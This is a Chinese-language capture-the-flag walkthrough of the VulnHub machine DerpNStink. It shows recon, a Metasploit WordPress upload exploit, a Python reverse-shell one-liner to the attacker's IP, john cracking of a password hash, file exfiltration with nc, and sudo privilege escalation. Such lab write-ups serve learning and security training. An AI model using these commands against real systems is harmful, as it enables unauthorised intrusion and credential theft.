vulnhub渗透日记06：DerpNStink

前言

⏰时间：2023.7.17
️靶机地址：https://www.vulnhub.com/entry/derpnstink-1,221/
⚠️文中涉及操作均在靶机模拟环境中完成，切勿未经授权用于真实环境。
本人水平有限，如有错误望指正，感谢您的查阅！
欢迎关注点赞收藏⭐️留言

信息收集

主机发现
nmap -sn
端口扫描
masscan --rate=100000 -p 1-65535 192.168.58.151
针对开放端口进一步探测
nmap -A -p 22,21,80 192.168.58.151
80端口网站源码处发现flag1，或者f12可以找到

同时找到这个，访问这个txt

得到提示，需要在hosts文件中写入域名 ，一开始以为是derpnstink.com ，结果后面访问显示derpnstink.local
扫目录发现存在/weblog/，admin：admin登录
wpscan扫描发现版本是4.6.26
存在利用点

反弹shell

msf搜索
use 3
exploit/unix/webapp/wp_slideshowgallery_upload
options看下需要配啥
一顿set之后run，进来了
进入shell执行python反弹shell，不反弹也可以
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.128",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty;pty.spawn(“/bin/bash”)'进入交互式shell，比较稳定
找到/weblog/wp-config.php,拿到数据库账号密码

phpmyadmin

扫目录还发现了phpmyadmin，直接登录

还有另一个用户 unclestinky

john解密

用john破解密码

echo '$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41' > code.hash
john code.hash --wordlist=/usr/share/wordlists/rockyou.txt
john code.hash --show #显示解出的密码

unclestinky：wedgie57
登录这个用户 看到flag2
看下用户
看能不能用刚才的密码登录过去
su stinky
进来先看看home，desktop里找到flag3
在ftp文件夹中发现套娃ssh，明显是公钥免密登录，这个应该是另一条通往登录stinky用户的路
但是提示不支持公钥免密

wireshark流量分析

所以只能通过su 登录
之后Documents的文件夹内发现derpissues.pcap，是个流量包文件，用wireshark分析下
kali执行 nc -lp 4444 > derpissues.pcap
目标执行 nc 192.168.58.128 4444 < derpissues.pcap
这样就把文件传输到kali

wireshark file.pcap 分析文件
tcp.stream eq 48 追踪tcp流
frame contains mrderp  /login 查看登录信息
http.request.method == "POST" 查看post请求的包

derpderpderpderpderpderpderp
su mrderp
进来后再看下home目录，没啥东西

sudo提权

sudo提权看下

mkdir binaries;cd binaries
echo '/bin/bash' > derpy.sh
chmod +x derpy.sh
sudo ./derpy.sh

需要在/home/mrderp/下新建binaries文件夹，并在binaries文件夹创建derpy.sh，文件名必须是这个